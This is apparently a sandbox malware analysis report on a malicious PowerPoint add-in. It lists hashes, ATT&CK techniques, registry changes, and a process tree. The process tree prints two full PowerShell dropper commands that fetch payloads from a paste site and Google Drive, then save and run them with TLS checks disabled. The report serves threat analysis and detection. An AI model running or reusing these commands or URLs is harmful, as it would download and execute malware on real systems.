ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1.ppam
Size

7KB
MD5

d9261e8c36689bfd3facc18f17910dc1
SHA1

ca0b6f093448082a736cc3ea3badf5adeea3ab4e
SHA256

ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1
SHA512

292a0da0b19e6f8950957804ea6cf6a98da954fbc78995481143ac8570793d77a204f732e5b514a503022ac1a1fdc51ad5190478db3f4244271ba2860165a36a
SSDEEP

192:xrXP/aKv8DGxzU0AGgMBnUI0JTuayR1NWO:dXPJxltL9UI0JyayRh

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pt.textbin.net/download/x7sf6t2dgv

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	2236	1976	powershell.exe	29
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	2852	1976	powershell.exe	29

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	2236	powershell.exe
8	2852	powershell.exe
9	2852	powershell.exe
11	2236	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2236	powershell.exe
2852	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
6	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493452-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493453-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346E-5A91-11CF-8700-00AA0060263B}\ = "ColorSchemes"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\ = "Rows"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493462-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Trendlines"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934B9-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493454-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493468-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6C-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CD-5A91-11CF-8700-00AA0060263B}\ = "DefaultWebOptions"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DF-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493480-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C5-5A91-11CF-8700-00AA0060263B}\ = "Column"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E8-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C4-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DF-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A60-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F8-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1976	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2236	powershell.exe
2852	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 2336	1976	POWERPNT.EXE	30
PID 1976 wrote to memory of 2336	1976	POWERPNT.EXE	30
PID 1976 wrote to memory of 2336	1976	POWERPNT.EXE	30
PID 1976 wrote to memory of 2336	1976	POWERPNT.EXE	30
PID 1976 wrote to memory of 2852	1976	POWERPNT.EXE	31
PID 1976 wrote to memory of 2852	1976	POWERPNT.EXE	31
PID 1976 wrote to memory of 2852	1976	POWERPNT.EXE	31
PID 1976 wrote to memory of 2852	1976	POWERPNT.EXE	31
PID 1976 wrote to memory of 2236	1976	POWERPNT.EXE	32
PID 1976 wrote to memory of 2236	1976	POWERPNT.EXE	32
PID 1976 wrote to memory of 2236	1976	POWERPNT.EXE	32
PID 1976 wrote to memory of 2236	1976	POWERPNT.EXE	32
PID 2852 wrote to memory of 1708	2852	powershell.exe	35
PID 2852 wrote to memory of 1708	2852	powershell.exe	35
PID 2852 wrote to memory of 1708	2852	powershell.exe	35
PID 2852 wrote to memory of 1708	2852	powershell.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1.ppam"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\system32\wscript.exe" x.js
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1708
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.js

Filesize
796B

MD5
b75621ae1faee608b4ed39e971d709a5

SHA1
bcd528eb22d2e7b1d11c9b603df87cec37d23da5

SHA256
54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

SHA512
5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

Download Submit
memory/1976-0-0x000000002D7C1000-0x000000002D7C2000-memory.dmp

Filesize
4KB

Download
memory/1976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1976-2-0x000000007214D000-0x0000000072158000-memory.dmp

Filesize
44KB

Download
memory/1976-11-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-10-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-8-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-5-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-6-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-4-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/1976-19-0x000000007214D000-0x0000000072158000-memory.dmp

Filesize
44KB

Download
memory/1976-20-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download